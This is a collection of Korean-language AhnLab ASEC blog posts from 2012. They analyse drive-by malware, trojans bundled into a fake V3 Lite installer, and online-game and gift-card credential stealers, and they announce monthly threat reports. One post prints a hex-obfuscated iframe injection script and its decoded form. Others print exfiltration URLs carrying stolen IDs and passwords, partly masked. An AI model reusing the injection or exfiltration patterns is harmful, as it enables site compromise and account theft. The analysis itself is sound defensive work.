악성코드가 탈취한 인증서를 사용하여 자신을 서명한 사례는 국내외에서 간헐적으로 발생해 왔고 언론을 통해 보도 된 바 있다. 이번에 발견된 악성코드는 국내 해킹된 웹 사이트를 통해 유포가 됐으며, PC를 감염시키는 과정에서 생성된 파일들 중에 하나가 특정 P2P 사이트의 인증서로 서명되어 있음을 발견하였다.

[그림 1] 국내 P2P 사이트의 인증서로 서명된 악성코드


[그림 1]이 최종으로 취약점(JAVA, IE, Flash Player)이 존재하는 PC로 다운로드 되어 실행되기까지의 과정을 정리해 보면 아래와 같다.

최초 악성 스크립트 링크가 삽입된 페이지 역시 P2P 웹 사이트였으며, makePCookie.js 파일에 Hex 문자열로 난독화된 형태의 악성 스크립트 링크가 존재 하였다.

http://on****.co.kr/js/makePCookie.js

• 난독화된 악성 스크립트 링크:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x77\x69\x64\x74\x68\x3d\x27\x31\x30\x30\x27x68\x65\x69\x67\x68\x74\x3d\x27\x30

\x27\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6e\x73\x6f\x66\x74\x2e\x64

\x69//---중간생략---//\x2e\x68\x74\x6d\x6c\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");

 

• 난독화 해제 후 코드:

<iframe width='100' height='0' src='http://snsoft.******bill.co.kr/about/css.html'></iframe>

 

난독화된 코드가 IE에 의해서 해석되면서 또 다른 특정 사이트로부터 악성 스크립트인 css.html을 다운로드 한 후 실행되도록 되어 있다. css.html은 국내 해킹된 웹 사이트에서 흔히 볼 수 있는 Exploit Toolkit인 Dadong 으로 난독화 되어 있으며, 기존의 형태와 마찬가지로 악성코드를 PC에 감염시키기 위해서 다중 취약점(JAVA, IE, Flash Player 등)을 사용했으며, 조건이 부합된 취약점을 통해서 실제 악성코드를 다운로드 및 실행하도록 해두었다.

아래 코드는 난독화된 css.html을 난독화 해제 한 후이며, 가능한 많은 PC를 감염시키기 위해서 자바 취약점 6개, Flash Player 1개, IE 1개 등 총 8개의 취약점을 사용했다.

 

Java

Flash Player

IE

CVE-2011-3544

CVE-2012-0507

CVE-2012-1723

CVE-2012-4681

CVE-2012-5076

CVE-2012-5076

CVE-2013-0634

CVE-2012-1889

[표 1] css.html이 사용한 취약점 ID


만약 PC에 위 [표 1] 중에 하나의 취약점이 존재한다면 해당 취약점으로 인해서 특정 사이트로부터 파일을 다운로드 한 후 실행한다.

-. 파일 다운로드 URL: http://snsoft.*****bill.co.kr/about/up.exe

[그림 2] up.exe의 실행구조


up.exe에 의해서 생성된 "%SYSTEM%\[서비스 이름]+32.dll"의 파일명은 감염된 PC에서 윈도우 정상 파일인 svchost.exe를 통해서 실행되는 서비스 명과 조합되며, 해당 파일을 이용하는 서비스 목록은 아래 레지스트리키 에서 확인이 가능하다.

[그림 3] svchost.exe를 통해서 실행되는 서비스 리스트


또한 up.exe는 감염된 PC의 맥 주소와 운영체제 버전정보 등을 암호화한 후 특정 IP로 전송하는 기능도 있다.

192.168.247.129 -> 116.***.121.*** UDP 360 Source port: simba-cs Destination port: 7125

[그림 4] 암호화 안된 시스템 정보

[그림 5] 암호화된 시스템 정보


 

<V3 제품군의 진단명>

  Trojan/Win32.Agent 


신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

 

 온라인 게임핵으로 인한 많은 피해사례들이 보고되고 있는 가운데, 악성코드 감염시스템을 확인해 보면 다수의 PUP 프로그램이 설치되어 있었다. 이러한 PUP프로그램을 통해 온라인 게임핵이 유포되는 경우가 종종 발견되고 있어 사용자의 주의가 필요하다.

 

많은 사람들이 무료 프로그램이나 특정 툴을 다운로드 받을 때, 제작사의 홈페이지를 통해서 프로그램을 다운로드 받는 것이 아니라, 특정 게시판이나 블로그를 통해서 다운로드 받기도 한다.

 

개인에게 무료로 제공되고 있는 V3 Lite의 설치파일(v3litesg_setup.exe)을 위장하여 V3 Lite설치와 동시에 다수의 PUP 프로그램을 설치하고, 이 중 특정 PUP 프로그램이 온라인 게임핵을 다운로드하여 설치하는 방식으로 유포되고 있었다.

 

- 악성코드 유포 블로그

[그림 1] 블로그에 게시된 악성파일

 

V3 설치파일로 위장한 파일을 다운로드 받은 후 속성을 살펴보면 안랩 홈페이지(http://www.ahnlab.com)에서 배포되는 V3 Lite의 설치버전과 다르다는 것을 알 수 있다.

 

[그림 2] V3 Lite 설치파일 비교(좌-악성 / 우-정상)

 

블로그에서 해당 파일을 다운로드 받아 설치를 진행하면 아래와 같이 다수의 제휴프로그램들의 설치에 대해 사용자 동의를 받으며, 동의를 하지 않을 경우 설치가 진행되지 않아, 사용자의 설치를 강요한다.

[그림 3] PUP 설치를 위한 사용자 동의

 

사용자가 이용약관에 동의하고 설치를 진행할 경우 V3 Lite 프로그램이 정상적으로 설치가 진행되지만, V3 Lite 설치와 동시에 바탕화면에 여러 P2P사이트와 쇼핑몰 사이트의 바로 가기 아이콘이 생성되고, 허위백신 프로그램이 설치가 된다.

 

여기서 PUP 란 불필요한 프로그램(PUP: Potentially Unwanted Program)으로 사용자가 동의하여 설치했지만 프로그램의 실제 내용이 설치 목적과 관련이 없거나 불필요한 프로그램으로, 시스템에 문제를 일으키거나 사용자에게 불편을 초래할 가능성을 가진 잠재적으로 위험한 프로그램을 말한다.

안랩은 허위 사실이나 과장된 결과로 수익을 얻는 경우나 프로그램 제작사 또는 배포지가 불분명한 경우 등 대다수 사용자가 불편을 호소한 프로그램을 불필요한 프로그램으로 진단하며, 사용자의 동의 하에 불필요한 프로그램을 검사하고 사용자가 선택적으로 삭제/허용할 수 있도록 한다.

 

설치파일 실행 시 다수의 PUP 프로그램이 설치되는데, 바탕화면에 P2P 사이트나 온라인 쇼핑몰 바로 가기 아이콘들이 생성되고, 수시로 광고 웹 페이지가 열리며, 아래와 같이 존재하지 않는 위협요소를 띄워서 사용자에게 공포심을 유발하여 결제를 유도하는 허위백신 프로그램도 함께 설치가 된다.

[그림 4] V3 Lite와 함께 설치되는 PUP 프로그램

 

이 중 "윈도우 유틸리티 업데이트(wuu_utilt*p.exe)가 온라인 게임핵을 다운로드 한 후 실행을 한다.

[그림 5] PUP 프로그램과 함께 설치되는 온라인 게임핵

[그림 6] 감염시스템의 MAC, OS, 백신프로그램 체크

 

해당 온라인 게임핵은 설치되는 과정에서 위와 같이 특정 서버로 사용 시스템의 MAC, OS, 백신프로그램의 정보가 체크되는 것이 확인되며, 최근 온라인 게임핵에서 자주 등장하는 ws2help.dll 정상파일 교체와 백신 프로그램을 무력화 하는 기능은 동일하게 나타났다.

 

이 글을 작성하는 시점에서 해당 블로그에 링크된 V3 Lite 설치파일을 다운로드 하여 설치할 경우 여전히 다수의 PUP 프로그램들이 설치가 되지만, 온라인 게임핵을 설치하는 기능을 하던 wuu_utilt*p.exe 파일이 변경되어 설치 진행 시 더 이상의 온라인 게임핵은 자동으로 설치가 되지 않았다.

 

이러한 피해사례를 사전에 예방하기 위해서는 반드시 해당 프로그램 제작사 홈페이지나 공식적인 다운로드 사이트를 통해서 내려 받아야 한다.

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

<V3 제품군의 진단명>

Trojan/Win32.OnlineGameHack 외 다수


신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

안랩 ASEC에서 2012년 12월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.36을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 12월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

온라인 뱅킹 트로이목마 Banki(1)

온라인 뱅킹 트로이목마 Banki(2)

패스워드를 노리는 악성코드

악성코드의 3단 콤보 공격

온라인 게임핵 변종 악성코드

특정 후보의 정책관련 한글문서 위장 악성코드

부킹닷컴을 사칭한 악성코드

과다 트래픽을 발생시키는 악성코드

상품권 번호 탈취하는 온라인 게임핵 악성코드

Xerox WorkCentre를 사칭한 악성 메일

Facebook을 사칭한 악성 e-mail 주의


2) 모바일 악성코드 이슈

국내 스마트폰 사용자를 노린 Win-Android/Chest 악성코드

PUP 앱의 폭발적인 증가


3) 보안 이슈

Stuxnet 기술을 이용하는 MySQL 취약점

지속적으로 보고되는 인터넷 익스플로러 use-after-free 취약점


4) 2012년 보안 동향 분석

악성코드 통계

- 2012년 악성코드, 1억3353만1120 건

- 악성코드 대표 진단명 감염보고 최다 20

- 2012년 악성코드 유형 ‘트로이목마’가 최다

모바일 악성코드 이슈

- 월간 모바일 악성코드 접수량

- 모바일 악성코드 유형

- 모바일 악성코드 진단명 감염보고 최다

보안 통계  

- 2012년 4분기 마이크로소프트 보안 업데이트 현황

웹 보안 통계

- 웹 사이트 악성코드 동향

웹 보안 이슈


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.36 발간


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

국내에서는 3가지 피해사례가 끊임없이 발견되고 있다.

1. 온라인게임 계정 유출로 인한 피해

2. 안드로이드 기반의 스마트폰 소액결제로 인한 피해

3. 상품권 번호 유출로 인한 피해

 

1,2 번 항목에 해당하는 악성코드는 ASEC 블로그를 통하여 많은 정보를 게시하였다.

http://asec.ahnlab.com/793 [온라인 게임 계정 유출 악성코드]

http://asec.ahnlab.com/772 [온라인 게임 계정 유출 악성코드]

http://asec.ahnlab.com/search/CHEST [스마트폰 SMS 정보 유출로 인한 결제 피해]

 

국내에서는 주말을 이용하여 대량 배포되고 있는 사용자의 정보 탈취용 악성코드가 끊임없이 발견되고 있다.

그 변종 또한 셀 수 없이 많으며, 이번에는 상품권 정보가 어떻게 유출 되는지 3번 항목에 대하여 살펴 보자.

 

해당 악성코드에 감염될 경우, 파일 생성 정보와 네트워크 정보는 아래와 같다.

네트워크 트래픽을 보면 PC의 MAC, OS, 사용하는 AV 정보들을 전송하는 것을 확인할 수 있다.

 

testsample.exe     CREATE C:\WINDOWS\system32\drivers\7f12a432.sys    

testsample.exe     CREATE C:\WINDOWS\system32\kakubi.dll

testsample.exe     CREATE C:\WINDOWS\system32\wshtcpbi.dll    

testsample.exe     DELETE C:\WINDOWS\system32\wshtcpip.dll    

testsample.exe     CREATE C:\WINDOWS\system32\wshtcpip.dll    

testsample.exe     CREATE C:\WINDOWS\system32\drivers\03b991b4.sys    

testsample.exe     DELETE C:\WINDOWS\system32\drivers\03b991b4.sys    

testsample.exe     DELETE C:\WINDOWS\system32\midimap.dll    

testsample.exe     CREATE C:\WINDOWS\system32\midimap.dll    

testsample.exe     CREATE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Coor.bat    

[File Monitor Information]

 

testsample.exe     TCP CONNECT     127.0.0.1    =>    2xx.16.1xx.xxx:80     

testsample.exe     HTTP CONNECT     127.0.0.1    =>    2xx.16.1xx.xxx:80     2xx.16.1xx.xxx/xx/get.asp?mac=3F72BD929D0****9E0C0E24FDDCC4F09&os=winxp%20Professional&avs=(V3)&ps=NO.&ver=NOON    

testsample.exe     TCP DISCONNECT     127.0.0.1    =>    2xx.16.1xx.xxx:80

[Network Monitor Information]

 

감염된 상태에서 특정 사이트를 접속하여 실제 유출되는 과정을 살펴보자.

 

- 계정 정보 탈취

[그림1] 북**** 닷컴 로그인 화면

 

위의 [그림1]은 북****닷컴 사이트의 로그인 화면이며, 로그인을 하게 되면 아래와 같은 패킷이 확인된다.

 

[그림2] 로그인 시, 패킷 덤프

 

[그림2]는 패킷을 캡쳐한 화면으로 GET 방식으로 2xx.2xx.xxx.xxx IP로 ID와 Password 가 전송되는 것을 확인할 수 있다.

 

- 상품권 정보 탈취

 

[그림3] 북****닷컴 상품권 입력 화면

 

 

[그림4] 상품권 번호 입력 시, 패킷덤프

 

로그인 후에 상품권 번호 입력을 하게 되면 로그인 계정과 마찬가지로 상품권 정보를 탈취하는 패킷을 확인할 수 있으며, 이 역시 같은 IP로 상품권 정보가 전송 된다. 테스트로 살펴본 북****닷컴 외에도 악성코드가 로드 되어 있을 때 메모리에서 아래의 사이트 String 정보들을 확인할 수 있었고 이 사이트들의 계정 정보도 탈취할 수 있다는 것을 보여준다.

 

aran.kr.gameclub.com

login.nexon.com

auth.siren24.com

bns.plaync.com

heroes.nexon.com

www.nexon.com

www.happymoney.co.kr

www.teencash.co.kr

www.cultureland.co.kr

www.booknlife.com

capogames.net

dragonnest.nexon.com

elsword.nexon.com

clubaudition.ndolfin.com

www.netmarble.net

itemmania.com

www.itembay.com

www.pmang.com

aion.plaync.jp

plaync.co.kr

maplestory.nexon.com

fifaonline.pmang.com

df.nexon.com

nxpay.nexon.com

baram.nexon.com

(생략…)

[그 외 해당 사이트들]

 

실제로 유출사례가 발견 되었고 꾸준히 발견되고 있는 악성코드인 만큼 사용자들의 각별한 주의가 요구된다.

이외에도 많은 악성코드들이 윈도우 및 응용프로그램 취약점을 통하여 감염된다.

따라서, 반드시 최신 보안패치를 설치하고, 안전성이 확인되지 않은 파일공유사이트(P2P, Torrent)등에서 받은 불법적인 파일은 실행하지 않는것이 중요하다.

 

Microsoft

http://update.microsoft.com

 

Flash Player 업데이트

http://get.adobe.com/kr/flashplayer/

 

▶ Java (JRE) 업데이트

http://www.java.com/ko/

 

▶ 한글과컴퓨터 업데이트 방법

http://asec.ahnlab.com/888 

 

<V3 제품군의 진단명>

Trojan/Win32.OnlineGameHack

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

안랩 ASEC에서 2012년 7월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.31을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 7월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

Banki 트로이목마의 공습

구글 코드를 악용한 악성코드 유포

국외 은행 피싱 메일

아래아한글 취약점을 악용한 파일 추가 발견

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷

BHO에 등록되는 온라인 게임핵 악성코드

WinSocketA.dll 파일을 이용하는 온라인 게임핵

Cross-Platform 악성코드

위구르족을 타깃으로 한 맥 악성코드


2) 모바일 악성코드 이슈

APT 공격과 관련된 안드로이드 악성코드 발견

스마트폰에도 설치되는 애드웨어


3) 보안 이슈

DNS changer 감염으로 인한 인터넷 접속 장애 주의

BIND 9 취약점 발견 및 업데이트 권고

어느 기업의 데이터 유출 후, 고객에게 보내진 ‘보안 패치’ 메일의 비밀


4) 웹 보안 이슈

GongDa Pack의 스크립트 악성코드 증가

해킹된 동영상 사이트를 통한 악성코드 유포

XML 코어 서비스 취약점 악용으로 온라인 게임 악성코드 유포


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.31 발간


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

안랩 ASEC에서 2012년 5월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.29을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 5월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

이력서로 위장한 악성코드

LinkedIn 스팸 메일을 위장한 악성코드 유포

DHL운송 메일로 위장한 악성코드

런던 올림픽 개최를 이용한 악성코드

ws2help.dll 파일을 패치하는 온라인게임핵 변종 악성코드

AV Kill 기능을 가진 온라인게임핵 악성코드

플래시 플레이어의 제로데이 취약점(CVE-2012-0779)을 이용하는 악성코드

Python으로 제작된 맥 악성코드

프로그램 설치 화면 놓치지 마세요

어린이날에도 쉬지 않는 악성코드 제작자


2) 모바일 악성코드 이슈

안드로이드 Notcompatible 악성코드 발견

어도비 플래시 플레이어로 위장한 안드로이드 악성 앱

허위 안드로이드 모바일 백신 유포

허위 유명 안드로이드 앱 배포 웹 사이트

Talking Tom Cat 사이트로 위장한 앱 사이트를 통해 유포되는 악성코드


3) 보안 이슈

어도비 플래시 플레이어 CVE-2012-0779 취약점 발견

'LOIC' 툴을 이용한 DDoS 공격 주의!


4) 웹 보안 이슈

꾸준히 발견되는 농협 피싱 사이트


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.29 발간


저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 6월 26일 마이크로소프트(Microsoft)의 XML 코어 서비스 취약점(CVE-2012-1889)을 악용한 공격 형태가 증가하고 있다는 안내를 한 바가 있다.


그리고  6월 28에는 해당 취약점을 악용하는 코드가 변형된 형태의 XML 코어 서비스 취약점(CVE-2012-1889) 악용하고 있는 것으로 공개한 바가 있으며, 취약한 웹 사이트를 중심으로 유포가 진행 되고 있다고 언급한 바가 있다.


현재까지도 보안 패치가 제공되지 않고 있는 제로 데이(Zero-Day, 0-Day) 취약점인 해당 XML 코어 서비스 취약점 악용형태가 지난 주말인 6월 30일과 7월 1일 이틀 사이 한국 내의 취약한 웹 사이트들을 대상으로 유포되고 있는 것이 발견되었다.


주말 사이 발견된 해당 XML 코어 서비스 취약점을 악용하는 스크립트 악성코드는 아래 이미지와 같은 형태이며, 이제까지 발견된 스크립트 악성코드와는 다르게 난독화 정도가 심하게 제작되어 있다.



해당 취약점을 악용하는 스크립트 악성코드는 최소 36개 이상의 온라인 게임 정보를 탈취하기 위한 악성코드 변형들을 유포하기 위해 제작되어 있다.


그리고 해당 취약점을 악용하는 스크립트 악성코드와 온라인 게임 정보 탈취 악성코드를 제작 및 유포하는 제작자들은 아래 이미지와 같은 툴을 이용하여 현재 자신들이 제작한 악성코드들이 정상적으로 유포 중인지 확인을 하고 있었다.



해당 툴은 악성코드 제작자들이 악성코드 유포를 위해 해킹한 시스템의 도메인 주소들을 입력하고 검색을 하게 되면 위 이미지에서와 같이 3회에 걸쳐 파일이 정상적으로 존재하는지 그리고 유포가 가능한지 확인 하게 된다.


이러한 툴이 제작되어 사용되고 있다는 것으로 미루어 악성코드 제작자들은 실시간으로 유포 중인 악성코드들의 상태를 확인하고, 하나의 유포 경로가 차단되었을 경우 다른 유포지를 가동시키기 위한 전략의 자동화를 위해 제작된 것으로 판단된다.


이 번에 발견된 해당 XML 코어 서비스 취약점을 악용하는 악성코드들 모두 V3 제품군에서 다음과 같이 진단한다.


JS/Agent

Win-Trojan/Hupe.Gen

Dropper/Hupe.Gen 
Win-Trojan/Onlinegamehack 변형들
Win-Trojan/Agent 변형들

그리고 네트워크 보안장비 트러스가드(TrusGuard) 제품군에서는 해당 난독화된 XML 코어 서비스 취약점 악용 스크립트 악성코드를 다음과 같이 탐지 및 차단이 가능하다.


http_obfuscated_javascript_fromcharcode  


앞서 언급한 바와 같이 현재 XML 코어 서비스는 마이크로소프트에서 보안 패치를 제공하지 않는 제로 데이(Zero-Day, 0-Day) 취약점이다. 


그러므로 사용하는 보안 제품을 최신 엔진으로 업데이트하고, 마이크로소프트에서 임시 방안으로 제공 중인 픽스 잇(Fix It)을 설치하는 것이 해당 취약점을 악용하는 악성코드 감염을 예방하는 방안이다.



저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

 2012년 05월 15일! 디아블로 매니아들은 열광했다.

고대하던 디아블로 3의 정식 출시 일이며, 많은 사용자들이 예약판매 등을 통해 플레이하는 즐거운 상상에 빠져 있었다. 그것도 잠시.. 서비스 논란에 이어 인터넷 상에는 자신의 디아블로 계정정보가 유출되었다는 글이 심심치 않게 올라왔다.

 

디아블로의 출시일로부터 11일 이후인 26일경, 일부 언론사를 통해서 유포된 게임핵 악성코드에 대하여 알아보자.

(디아블로와 관련된 모든 피해가 이 문서에서 언급한 게임핵 악성코드에 의해서 발생한 것이라고 단정지을 수는 없다.)

 

 26일 당시 게임핵 악성코드를 유포했던 특정 언론사의 경우 상위 도메인을 기준으로 서비스 별로 여러 개의 하위 도메인이 존재하고, 각 하위 도메인 별로 각각 다른 페이지에 악성코드를 다운로드 하는 주소가 삽입되어 있다.

(현재 유포 URL은 유효하지 않다.)

 

[그림 1] 언론사의 악성코드 유포구조

 

각 서브 도메인의 페이지에 삽입된 악성 스크립트 코드는 "스페이스와 탭을 이용한 자바스크립트 난독화"형태의 코드이다.

※ 스페이스와 탭을 이용한 자바스크립트 난독화 출현: http://asec.ahnlab.com/767

 

[그림 2] 스페이스와 탭을 이용한 자바스크립트

 

 

악성코드에는 아래와 같은 문자열들이 존재한다.

 

00012C24 10014824 0 Diablo3

00012C2C 1001482C 0 Diablo III.exe

 

0001240C 1001400C 0 &password

00012418 10014018 0 accountName

00012424 10014024 0 kr.battle.net

 

위 문자열들로 아래와 같이 추정 가능하다.

 

1. 디아블로 3가 실행 중일 경우와 2. kr.battle.net 사이트에 로그인 할 경우 계정정보가 탈취 될 수 있을것으로 추정해볼 수 있다.

 

실제 사용자의 계정정보를 탈취하기 위해 위의 2가지 방식을 사용했으며 전송 과정은 아래와 같다.

특이한 점은 계정정보를 탈취한 후 각각 다른 주소로 전송한다.

 

1. 디아블로 3가 실행중인 경우

http://blood.***sda.com/post.asp?para=zj527&d00=XXLR&d01=XXLR&d10=[계정 ID]

&d11=[계정 PW]&d20=&d21=&d30=&d32=&d40=0&d60=&d61=&d70=0&d50=56

 

2. kr.battle.net 사이트에 로그인할 경우

http://lep.***sds.com/ah3/post.asp?para=zj527&d00=Diablo3&d01=Diablo3&d10==[계정 ID]&d11==[계정 PW]&d20=&d21=&d30=&d32=&d40=0&d60=&d61=&d70=0&d50=

 

이번에 발견된 게임핵 악성코드는 디아블로를 포함한 다수의 온라인 게임들의 계정정보를 탈취할 목적을 가지고 있다.

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

Trojan/Win32.OnlineGameHack

Trojan/Win32.Gampass

 

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

안랩 ASEC에서 2012년 4월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.28을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 4월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

악성 DOC 문서를 첨부한 스피어 피싱 메일

북한 광명성 3호 발사 및 핵 실험을 주제로 한 악성코드

4.11 총선 이슈에 발견된 악성코드

런던 올림픽 개최를 이용한 악성코드

핵 안보 정상회담 PDF 문서로 위장한 악성코드

사회공학 기법을 이용하여 유포되는 악성 HWP 파일

국내 주요 금융기관 피싱 사이트 다수 발견

페이스북을 통해 유포되는 보안 제품 무력화 악성코드

보안 제품의 업데이트를 방해하는 Host 파일 변경 악성코드 주의

보안 제품 동작을 방해하는 온라인 게임핵 변종

Mac OS를 대상으로 하는 보안 위협의 증가

윈도우, Mac OS를 동시에 감염시키는 악성코드

자바, MS 오피스 취약점을 이용하여 유포되는 Mac OS X 악성코드

티베트 NGO를 타깃으로 하는 Mac 악성코드

낚시 포털 사이트를 통해 유포되는 온라인게임 계정 탈취 악성코드

스턱스넷 변형으로 알려진 듀큐 악성코드의 변형

스파이아이 공격 대상 기업들의 업종과 국가 분석


2) 모바일 악성코드 이슈

Another fake Angry birds


3) 악성코드 분석 특집

불필요한 옵션 사용으로 발생할 수 있는 스마트폰 보안 위협과 대응


4) 보안 이슈

윈도우 공용 컨트롤 취약점(CVE-2012-0158)을 악용하는 문서


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.28 발간


저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원
안철수연구소 ASEC에서 2012년 2월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.26을 발간하였다. 

 
이 번에 발간된 ASEC 리포트는 2012년 2월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.

1) 악성코드 이슈
 PC에 존재하는 모든 문서 파일을 탈취하는 악성코드
누군가 나를 지켜보고 있다? 웹캠으로 도촬하는 악성코드
가짜 KB국민은행 피싱 사이트 주의
스마트폰의 문자 메시지로 전달되는 단축 URL
특정 기관을 목표로 발송되는 발신인 불명의 이메일 주의
시리아 반정부군을 감시하기 위한 악성코드 유포
변형된 MS12-004 취약점 악용 스크립트 발견
MS11-073 워드 취약점을 이용하는 타깃 공격 발생
어도비 플래시 취약점 이용한 문서 파일 발견
wshtcpip.dll 파일을 변경하는 온라인게임핵 발견
윈도우 비스타, 윈도우 7을 대상으로 하는 온라인게임핵 악성코드 발견

2) 모바일 악성코드 이슈
안드로이드 애플리케이션에 포함된 윈도우 악성코드

3) 보안 이슈
국내 동영상 플레이어 프로그램의 취약점
아래아한글 스크립트 실행 취약

4) 악성코드 분석 특집
내가 설치한 앱이 악성코드라고?

 
안철수연구소 ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 

ASEC 보안 위협 동향 리포트 2011 Vol.26 발간
저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원